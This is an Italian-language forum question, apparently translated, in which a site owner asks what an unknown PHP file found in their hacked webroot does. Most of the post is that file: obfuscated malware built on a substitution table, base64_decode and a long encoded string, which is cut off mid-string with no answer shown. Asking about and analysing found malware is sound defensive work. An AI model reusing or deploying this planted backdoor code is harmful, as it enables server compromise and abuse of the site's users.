Che cosa fa questo script PHP dannoso? [chiuso]

7

Qualcuno ha hackerato il mio sito e caricato questo script ( template46.php ) sul mio webroot e il suo contenuto è:

<?php
$vIIJ30Y = Array('1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
function v78ZFAX($vJOJJ7T, $vRJ8WGX){$vM74216 = ''; for($i=0; $i < strlen($vJOJJ7T); $i++){$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];}
return base64_decode($vM74216);}
$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.
'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.
'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'.
'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'.
'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'.
'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'.
'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'.
'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'.
'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'.
'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'.
'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'.
'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'.
'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'.
'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'.
'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'.
'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'.
'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'.
'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'.
'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'.
'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'.
'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'.
't8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'.
'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'.
'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'.
'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'.
'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'.
'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'.
'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'.
'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'.
'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'.
'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.
'KgR4SgR4Sgj2X9At28Rk4oxjO97rtH7NMSxOSgR3Sgl22oB24SgOTgj2cgjPK9zcW9710HgGPKBwVe723'.
'bWktbWGO9dm2H7JjipZjKBwVe723SlPKoJPKgxm4HBwV9xGcYgm4HBwV9RQ8eRKWeR2ubz1v9gjOUBt28'.
'7wMSw4TgjOKKfmP97r2Yy4je7N49RKu8710bzcMSgm4HBwV9w3AUBt287aARxOTgjOKKfmP97r2Yy4j8dwVRsrteEKnbWj'.
'OUBt287aXCJPKgxm4HBwV9xGcYfm2ofmu8710bzcMSgm4HBwV9xOTgjOKKfmP97r2Yy4joBLr8wcVe'.
'7QW8E5PKfmP97r2Sp3SgjOKKBr2bEQt9sajixGO87wMbs1d9RQ8eRKWeR2ubz1v9gjO87wMbs1d9R5XRp3SglOO8'.
'7wMbs1d9xGcYB13UBwWRsrteEKnbWjO87wMbs1d9w3A87wMbs1d9xKUSp3SglOO87wMbs'.
'1d9xGcYBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4jUBwZU1cVe'.
'7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4joBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxFnKBr2bEQt9saj'.
'ixkJeRQMRsrteEKnbWjO87wMbs1d9xJjKfktbEQ2bWOTgjOKKBr2bEQt9sajixkzUBwX81cVe7QW8E5PKBr2bE'.
'Qt9sa3YgmzUBwX8gOTgjPKgxmzbzcVYy4jKB9W8srM7s1Wbz1LREKt8zlPKB9W8srMSw4TgjOKKB9W8s4jixkt8fm2b'.
'2cVe7QW8E5PKB9W8sr8Yz9W8s4ARxOTgjOKKB9W8s4jixkvU7ru8710bzcMSg'.
'mzbzcVSp3SglOO9dKn8xGcYfm2ofmu8710bzcMSgmzbzcVSp3SglOO9dKn8xGcYftvU7ru87'.
'10bzcMSgmzbzcVSp3SglOSgl2X9AGPbEmWbEmWSgmzbzcV6gGA74Q'.
'warmipw4ASxGcixkBlaNpmxOSgl2TgjOKgxmzbzcVYy4j9dKn8wcP8EQ4S'.
'gmzbzcVSp3Sgl2cgjOK97NM9lPKgR3SglOKKB9W8s4jixkMUfKubzwJ8B109xjA74Qwarmipw4A6g'.
'GAYAJjKB9W8s4XCJPKgR4SgjOKKBrtH7N2bAGcYgmVe7239RKM7s1Wbz1LREKt8zlPKBr'.
'tH7N2bd5XRp3SgjOKbswv91cVe723SgmzbzcV6gGO97rtH7J3Ygm4HBwV9xJjK'.
'Br2bEQt9sa3YgmVe7239RYXCJPKulXcgjXzU7L0UB2n8AkM97LORsrtH7JPKB'.
'9W8s43Ygm48WJjKfQrezP3Ygm49Rt46gGO871X8BwWSlXTgAGjYgGOHBwt9gGcYgYACJPSYgGjYgmr8AGcY'.
'fQ4bdmnURkJ9RYPU7LXb72OSfmX87aPSxOXCJPSYgGjYgmP971OYgZcYgKBb'.
'zcVCAGO9dKn8wNvY03SYgGjYgmP971OYgZcYgKe6artH7N2b0PjKBrtH7N2b2NvY03SYgGjYgmP971OYgZcYgKx9Rk3oxra8MPj'.
'KB9W8srb8AYTgjPjYgGjKBt2e7lj604jYOrX87aVwzwWbs2n80Pj5xZJRBZACJPjYgGjKBt2e7lj604jYOQn8dm28dlVwf2J9'.
'pPj8Rw3UB2JeRK46s13UBwW8z14HR92CWYTgAGjYgGOHBwt9gGvixGAezcr8zmtbdOcRgYV6x4V6x4V6x4VYAZO'.
'U7ZvY2JARBLb8AYTgAGjYgGSYgGjYgmJ8B1X8AGcYfQ4bz2JREmt9E5PKfm2oflXCJPjYgGjKfXt9WGcYgYV6x4V6x'.
'4V6x4V6x4A6Amr8AZARBLy8sL497L46wmLbBaDYfm2oflnbBNtH7ZTYBQ'.
'PeRKM9RlcRgKKa4FVCyjrCx4NRgYTYB9nbzrtUyrz8BcE97mb8AYTgAGjYgGOoz1dYgZcYgKy8sL'.
'497L46wmWe7LM9zwW6awvescOH7LdCAGEez24RBLb8AYvKfk3e72v6AKb82NvY03SYgGjYGPjYgGjKf'.
'Xt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvY2NvlscvUBwvUgraoRk2CAk49Rt46'.
'st487JTYBQPeRKM9RlcRgKKa4FVCyjrCx4NRgYTRBZACJPjYgGjKfXt9WGvixGAlscvUBwvUgrabz1vbs'.
'92bAr18zQn9B2v9MPjQsKXU1NvRBZOUBwZU1NvRBZACJPjYgGjKfXt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvYA4VY'.
'03SYgGjYGPjYgGjH7ePescr8dlPK1cBxaN1aWOjiAGJSlPjYgGjoJPjYgGjYgGjYB9nbzwtesjPK1cBxa'.
'N1aWktbWGO9z239xOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYB2zSB9X8'.
'Bwu9RtXbEmMSgmzH7N27WK48Rku8z1V9xKUSxOSYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgG'.
'jKBejixkz8Ek28AjO9z239w3AUBrJRsLt87aARxJjYdKAYAOTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgY'.
'V6x4V6x4V6x4V6x4A6Amr8AZARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgraoRk2CAktbfk'.
'3H7QtUB2n8AcneEm2UgrMUfK2e74TY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj60'.
'4jYzLt87acRgYA6AmzH7N27WKve7r2Y24vY2JARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgr'.
'abz1vbs92bAr18zQn9B2v9MXAeRQ2Q0mb8AYTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgKy8sL497L46amXbE'.
'knbs24H7cvCz14UB10HBr28dlTY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj604jYz9X8Bwve7r2iwJAYAZO9z239w3A8z1V9'.
'xKU6AKbY2NvRBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixk0HfwvHr'.
'cMbBNXUgtAeRQ2Q0mu97L08sm2SB9W971OSgmz6gkzH7N2bs2D9xjO9z239w3AUBrJRsLt87aARxOXSxO'.
'vY2NvY03SYgGjYgGjYgGjYgGjYgGjYB908BcM9xjO9AOTgAGjY'.
'gGjYgGjYgGjYf4SYgGjYgGjYgkcgAGjYgkcgjPjYgGjH7ePlBrtH7JPKfmn6gGObEwAHAJjKfXt'.
'9WJjKBt2e7lXSlPjYgGjoJPjYgGjYgGjYB2zSg128Rk4oxjORrkiarm8KE92bzKnbsadRxOXgAGjYgGjYgGjYgG'.
'jYBw0HBFjY2Q1pOm1mgYTgAGjYgkcgAGjYgk28fQ2gAGjYgkTgAGjYgGjYgGjH7ePY7wVbfmLSgmuahcpw13dUzwWezcM9xUU'.
'SxOSYgGjYgGjYgGjYgGj97QP8WGAmO1KpgYTgAGjYgkcgd4Sgz9r8zQ4H7cvYB13UBwWRsrteEKn'.
'bWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQTSgZISR40w7Od6gGOescvUBwvUgJjKBrtUBQP9R5XCJPSYgGjY'.
'B9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ85w4XCWGOHx3qSlPjYgGjoJPSYgGjYgGjYgG'.
'O8d5jixk2ofk38sm2SgKFYAJjKBrtUBQP9RQ85wr8KB2USp3SYgGjYgGjYgGOeMYjixk08EwvUgjO8d5XCJPjYgGjYgG'.
'jYgmWe7LOYy4jbz1v9gjJ6gGPKB5WYg4j5xOXCJPjYgGjYgGjYgm08sL497L4Yy4jbEmWREK2bBNtesaPYd3A6Am'.
'VeRm0HBwM7M1U7WmXRxZAuxY3Ygmvbr3Obz1v9143Ygm08sL497L4S'.
'p3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjUBw'.
'ZU1cVe7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sgb0R1VamwtaRg4P7r3D9B2dHRlDRw4qSwJVS'.
'1V8CzmX9s24C2rUSW2bRx5d6gGOescvUBwvUgJjKBrtUBQP9R5'.
'XCJPSYgGjYB9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ8514XCWGOHx3qSlPjYgGjoJPjYgGjYgGjYgmVH7ZjixG'.
'O8714est2br3NRw3OHw4TgAGjYgGjYgGjKBrtogGcYgmVeRm0HBwM7MKU7WmXRp3SYgGjYgGjYgGObz1v9gGcYfKt8zlPKBr'.
'X8AJjKBrtogOTgAGjYgGjYgGjKfUnbzljixkd97L2bz149wcE8EKOSgmWe7LOSp3SgAGjYgGjYgGjKB'.
'Qn8dm28dljixkJbzwdREK2bBNtesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB'.
'2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAGjYgkcgjPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rm171mb6xt87MXOH'.
'7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EYPKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7'.
'MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGOescr8dljixGO8714est2br3NRw3OHw4TgjP'.
'jYgGjYgGjYgmE8EKOYgGcYBU28zwWeRm2REUnbzlPKBQnU7L4Sp3SgAGjYgGjYgGjKBQn8dm28dljixkJbzwdREK2bBN'.
'tesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAG'.
'jYgkcgjPSYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjoBLr8wc'.
'Ve7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sg'.
'b0R1VCwarb6xt87MXOH7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EY'.
'PKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGO8dwVY'.
'y4jKBrtUBQP9RQ85wr8KB2UCJPjYgGjYgGjYgmVH7ZjixkJ8EbP5pG3YgmvU74j6xGNSp3SYg'.
'GjYgGjYgGO871ZYy4jbBcESyhJ6gGO8dwVSxGVYyhTgjPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6g'.
'GO871ZSp3SYgGjYgGjYgGOescvUBwvUgGcYfQ4b2cW9Rk3e7Q2SgmVeR'.
'm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp3SYgGjYf4SYgGjYfK2UfwW8AGOescvUB'.
'wvUy3SulPS9dwveEmX8sZj8dwVRsrteEKnbWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rKkpOmb6xt87M'.
'XOH7UXUyXURx3XRg4P7r3D9B2dHRlDRw4qSwNUYWb3Ygm08sL497L46gGO8714est2bWOTgjP'.
'jYgGj9zcWSgmXYy4j5y3jKBOjigk08EwvUgjO8714est2br3JRxOTYgmXSW3XgAGjYgkTgAGjYgGjYgGjKBrX8AGcYgmV'.
'eRm0HBwM7M1U7WmXRp3SYgGjYgGjYgGO871ZYy4jKBrtUBQP9RQ'.
'852r8KB2UCJPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6gGO871ZSp3SYgGjYgGjYgGOescvUBw'.
'vUgGcYfQ4b2cW9Rk3e7Q2SgmVeRm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp'.
'3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZj9swv9RKtUBwuUscW9gjO8Bwv9EmPSlXTgAGjYgGOesttb'.
'd5jixGde7K09Bwz9stXHzV387Lnbf1WbEmrUd2ZoAbTgAGjYgGO8dwVlsttbd5jixkMUfK397ZPKBQPeRKMSp3SYgGjYgm'.
'MUfKX8zbjixGdKM3SYgGjYB9nbAjOHxGcYyGTYgmXYyJjKBN28zU4Hy3jKBOqSWOSYgGjYf3SYgGjYgGjYgGObEmWH7Ld'.
'YgZcYfQredQ4bAjOesttbd53YfKt8zlP5xJjKBLr8aQPeRKMSxGVYyh3YyhXCJPjYgGjulPjY'.
'gGjbzw4URKvYgmMUfKX8zbTgd4Sgz9r8zQ4H7cvYfktbEQu8710b'.
'zcMSgm08sL497L46gGObB1MbswMSlXTgAGjYgGObB1MbWGcYB1Wbz1LREknbgjObB1MbswMSp3SYgGjYGPj'.
'YgGjbzw4URKvYfQ4b2cW9Rk3e7Q2SgK8ah1par4A6gGObB1MbWJjKBQn8d'.
'm28dlXCJXcgjXzU7L0UB2n8AkzUBwX81cVe7QW8E5PKBQn8dm28dl3YgmzUBwX8gOSoW'.
'GjYgGSYgGjYfK2UfwW8AkMUfKubzwJ8B109xjA749ama25RxY3YgmzUBwX8gJjKBQn8dm28dlXCJ'.
'XcgjXzU7L0UB2n8AkXbrcXbgjObEmWSxkTgAGjbzw4URKvYfkW97Uu8714esjPYAcoS13N6p2Uu13N6'.
'p2U7MGVCwrF5w3J6p2U7MGVCwrF523J6pmU7MGVCwrF50w85g4rRxOPRgZP7MGVCwrF7MhVCwr85g4LRRJ'.
'N7MGVCwr85g4LRRJW7MGVQ1r85g4LRRJWQw3J6pwUSx2T5E4O6W'.
'Y3KfQ4bAOTgd4Sgz9r8zQ4H7cvYB9W8sruHBcMUgjOescvUBwvUgOSoJPSYgGjYgmP8EQ4Yy4jbfK29'.
'rcW9Rk3e7Q2SgbnRAtEUEUF9dmJSwJv6sOd6gbd6hGORrQ1a291a23dx1maa1cYprQaKr4XCJPSYgGjY'.
'B2zYgtXbrcXbgjOHBcMUgOXgAGjYgkTgAGjYgGjYgGjbzw4URKvYgm08sL497L4C'.
'JPjYgGjulPjYgGjgAGjYgGOUBcq97LMYy4j9RtJ8BcO9xjAlgY3Ygm08sL497L'.
'4Sp3SgAGjYgGOescvUBwvUgGcYgm48sV28dQ8514j6AGAlgYj6AGOHBcMUgGvYg'.
'Y+Y03SgAGjYgkW9RmrbzZjKBQn8dm28dlTgd4Sgz9r8zQ4H7cvYBwWbzcWRMl'.
'JQgjXgd3Sg7t2e7m2bAjAx1maagFN60hjQyG4YhLnUgkB8Ewv9gYXCJPSgxmrbzOjixkJbzwdREK'.
'2bBNtesaPKWFPRyFX6APO6Wb3Ygbd6gGORrQ1a291a23daOwmwawpw1cwaOOdRxGXCJPS'.
'gxm08sL497L4Yy4jeEwMUBcVRst4UfkubzwNU7wMUyhPYzt4UfGD6'.
'WFA6Amua4wxwOwx7WUYw1mlR4tiarldRxZA641Ba7XypOtvHytx'.
'UfmBxpQ7pRKg9Bm9UM9W8zU6o0U6mahASp3Sgxm08sL497L4Yy4jb'.
'EmWREK2bBNtesaPYgYnla9mHOQCxBLPC1K4Uh9K5r9QbOKO912EQdKv94VDQ4V1lxY3Ygmrb'.
'zO3Ygm08sL497L4YgOTgjPK9RtXUgjjKBQn8dm28dljSp3SulPSgz9r8zQ4H7cvYBQrbEmn8wcPUfmJREK2bRw2bElNSgmJe'.
'RKt8R5Xgd3SYgGjYB2zSgGtYB2MRs1Wbz1LSgmJeRKt8R5XYgOSYg'.
'GjYf3SYgGjYgGjYgGObB1We7rMYy4jeRKWeROPgAGjYgGjYgGjYg'.
'GjYgUrbzJdYy4+YgmJeRKt8R53gAGjYgGjYgGjYgGjYgUV9RmP8sldYy4+YgUfmwldgAGjYgGjYgGj'.
'Sp3SYgGjYf4SYgGjYGPjYgGjH7ePYgmJeRKt8RQ8KEwW8gUUip4dKWG'.
'XYfK2UfwW8AkBlaNpmp3SYgGjYGPjYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3'.
'd87w4HBcOKr4XYgOjKfktbz1Vbr3d87w4HBcOKr4jixGPHRQM9RlPKf'.
'ktbz1Vbr3d9B14exUUSxezHRQueRKWeROPKfktbz1Vbr3d9B14exUUSxOjiWGdahcpwg'.
'bjCAGdm4waKM3SYgGjYgmJeRKt8RQ8Ksr2UBtn9gUUYy4jbEmWUBcrbfk2bAjOb'.
'B1We7rM7WUV9RmP8sldRxOTgAGjYgkX9AjjYxkX82ctbdKtoxjObB1We7rM7WUV9R'.
'mP8sldRxJjeRKWeROPK4U1wgb3YgUlprQaKWOXYgOjbzw4URKvYh9kp1Q1CWGSYgGjYGPjYgGj6WPj4K/mj'.
'QgZ466lnVg4460lngymjUBk4enlvcgD4e5j46Yj46/mjQgJ466lvQgT4eMlnUB646Oj466'.
'lvQg4YgPngAGjYgGOURK3Yy4jbB1WbswuURK3SgmJeRKt8RQ8KEwW8gUUSp3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KEQ0HBwV9xU'.
'USxGXYgmrbzN8KEQ0HBwV9xUUYy4jKst4UfGdCJPjYgGjH7ePYghjHRQM9RlPKfwW813dbB14HgUUSxGXYgmrbzN8K'.
'EktUBjdRxGcYgbnKM3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KstnbEldRxOjKAejHRQM9RlPKfwW813dbB14HgUU'.
'SxGXgAGjYgkTgAGjYgGjYgGjH7ePYfQ4bdknbWjOURK37WUJeRmPKr43YgbnKWOjSlPjYgGjYgGjYf'.
'3SYgGjYgGjYgGjYgGjKfwW813dHBcMUgUUYy4jbEwAbEmWSgmrbzN8KEktUBjdRxJ'.
'j5gJjbEmWbBcMSgmrbzN8KEktUBjdRxJjKWFdSxOTgAGjYgGjYgGjY'.
'gGjYgmrbzN8KEktUBjdRxGcYfQredQ4bAjOURK37WUJeRmPKr43YfQ4bdknbWjOURK37'.
'WUJeRmPKr43YgbnKWOXCJPjYgGjYgGjYf4SYgGjYgGjYgk28fQ2gAGjYgGjYgGjoJPjYgGjYgGjYgGjYgGOU'.
'RK37WUP8EQ4Kr4jixGOURK37WUJeRmPKr4TgAGjYgGjYgGjYgGjYgmrbzN8KEktUBjdRxGcYgbnKM3KgAGjYgGjYgGjulP'.
'jYgGjulPjYgGjKfwW813dbB14HgUUYy4jbfK29rcW9Rk3e7Q2SgYn7rNb6r4q6WY3YgYnYAJjKfwW813dbB14HgUUSp3S'.
'YgGjYB2zSgkXbEQ2UgjOURK37WUNU7wWoxUUSxGXYgmrbzN8KEktUBjdRxGv'.
'ixGAiE3OURK37WUNU7wWoxUUuxYTgAGjYgGSYgGjYgmJ8EK4Yy4jHR'.
'QM9RlPKfktbz1Vbr3dbBcWUgUUSxG/YgmJeRKt8RQ8KEknbdldRlPjYgGjYgGjYgGjYgGDYgjjHRQM9RlPKfwW813dbBc'.
'WUgUUSxG/YgmrbzN8KEknbdldRxGDYgjOURK37WUMest287adRp4cKst4UfkMKMF4Qy5DCyGXYgOTgAG'.
'jYgGSYgGjYgm4H7r28Ew4Yy4jHRQM9RlPKfktbz1Vbr3dUB2V97crUgUUSxG/YgmJeRKt8RQ8KEmX87wnURldRxGDYy5JCJP'.
'jYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3dbzw4URKvKr4XYgOjKfktbz1Vbr3dbzw4URKvKr4jixGdescvUBwvUgbTgAGjYgGS'.
'YgGjYgmMest287ajixGOURK37WUMest287adRp4cKst4UfkMKWG/YgUMbsJD6WFdCAbdCJPjYgGjKB9JYy4jlB'.
'9M8sQq8Ek28AjObsQP97r26AmrbzN8KstnbEldRxJjKfknbdl3Ygm2bdKv8WJjKBwWbdQ4bAJjKfmX87wnURlXCJPjYgG'.
'jH7ePYgmzbgGXgAGjYgkTgAGjYgGjYgGj6WPjp7cDH7N3exGI6JPjYgGjYgGjYB2zSgGtYB2Mbsw4SgmJe'.
'RKt8RQ8KrwM9RYVl7U28dldRxOjSxGObB1We7rM7WUwbswW6a1d97L4Kr4jixGAp7cDH7'.
'N3exFr60GjSB2lHBcv9p3jwp3jlrkwYB2lHBcv9xkiaWGMRMGj8B2q9xkQe75jpr5j7y3j97Z'.
'VUR5XYh1JbBN2wswAxs246MaWCgZNCgGPx4tapaJ3YBNXHsajmsw0HsFXY192bdQX8sZnQgZJYhrnez2'.
'39xFElp545xkpe79tbzOnQpYZ60hsY03SYgGjYgGjYgGSYgGjYgGjYgGObzwNU7'.
'wMUgGcYgKTKfktbz1Vbr3d87w4HBcOKrrcYf3OURK37WUJeRmPKrrcYhtaw1Gn5xZJRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jYOtnbElDYf3OURK37WUP8EQ4KrrcRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jY2wM9RYVl7U28dlDYf3ObB1We7rM7WUwbswW6a1d97L4KrrcYAZARfKb8AYT'.
'gAGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KEK29zwW9RYdRxOjSxGObzwNU7wMUg'.
'GvixGAazwz9RK2b0PjoWmJeRKt8RQ8KEK29zwW9RYdRRrbb2NvY03SYgGjYgGjYgkX9AjjHRQM9'.
'RlPKfktbz1Vbr3descnHs22Kr4XYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgm08scqH7ajixGAY03SYgG'.
'jYgGjYgGjYgGjH7ePYB2MRs1Wbz1LSgmJeRKt8RQ8KsQn8sVX9xUUSxGXYfVz8EK2e7QPSgGObB1We7r'.
'M7WU08scqH7adRxktbWGOHM4+KfejSxGOescnHs22YgZcYgYOHM4OU03jY03jKBQn8sVX'.
'9xGcYfQredQ4bAjOescnHs226yG36pYXCE4SYgGjYgGjYgGjYgGj97NM9xGOescnHs22Yy'.
'4jKfktbz1Vbr3descnHs22Kr4TgAGjYgGjYgGjYgGjYB2zSgGOescnHs22Yp4dKWGXYgmW9R1r9RQ4YgZcYgKy8scqH7aD'.
'Ygm08scqH7wbb2NvY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jYOQn8zL2eEmX8sZDYBQ38EQ2RfKb8AYT'.
'gAGjYgGjYgGjH7ePYgmJeRKt8RQ8Ksr2UBtn9gUUip4dahcpwgbjSlPjYgGjYgGjY'.
'f3SYgGjYgGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KsmtUBhdRxOjKAejHRQueRKWeROPKfk'.
'tbz1Vbr3d9B14exUUSxGXgAGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgGjYgGjYB9nbzwtesjPKfktbz'.
'1Vbr3d9B14exUUYh1pYgmqYy4+YgmsSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgmOeRmtYgZcYfwW8BwvescO9xjO'.
'HWOvKM4d6dwW8BwvescO9xjOUAOvKWedCJPjYgGjYgGjYgGjYgGjYgGjH7ePYfQredQ4bAjO9B14ex'.
'Jj6phXip4dKAbjSxGO9B14exGcYfQredQ4bAjO9B14exJJ6g4NSp3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGO9B14ex'.
'GvixGARfKb82NWRBZACJPjYgGjYgGjYgGjYgGSYgGjYgGjYgGjYgGjKfK2bRw2bElj604jYOQn8dm28dlVUf2'.
'J9pPjeRkJ8B20eRmX8sZnogrEUEbV9zcW8xrrbzN28zQn9BwORfKb8AYTgAGjYgGjYgGjYg'.
'GjYgmW9R1r9RQ4YgZcYgKy8sL497L467N28zU4HyPjYALMUfK397ZPKBmtUBhX6AKbb2N'.
'vY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jY2NWRBZACJPjYgGj'.
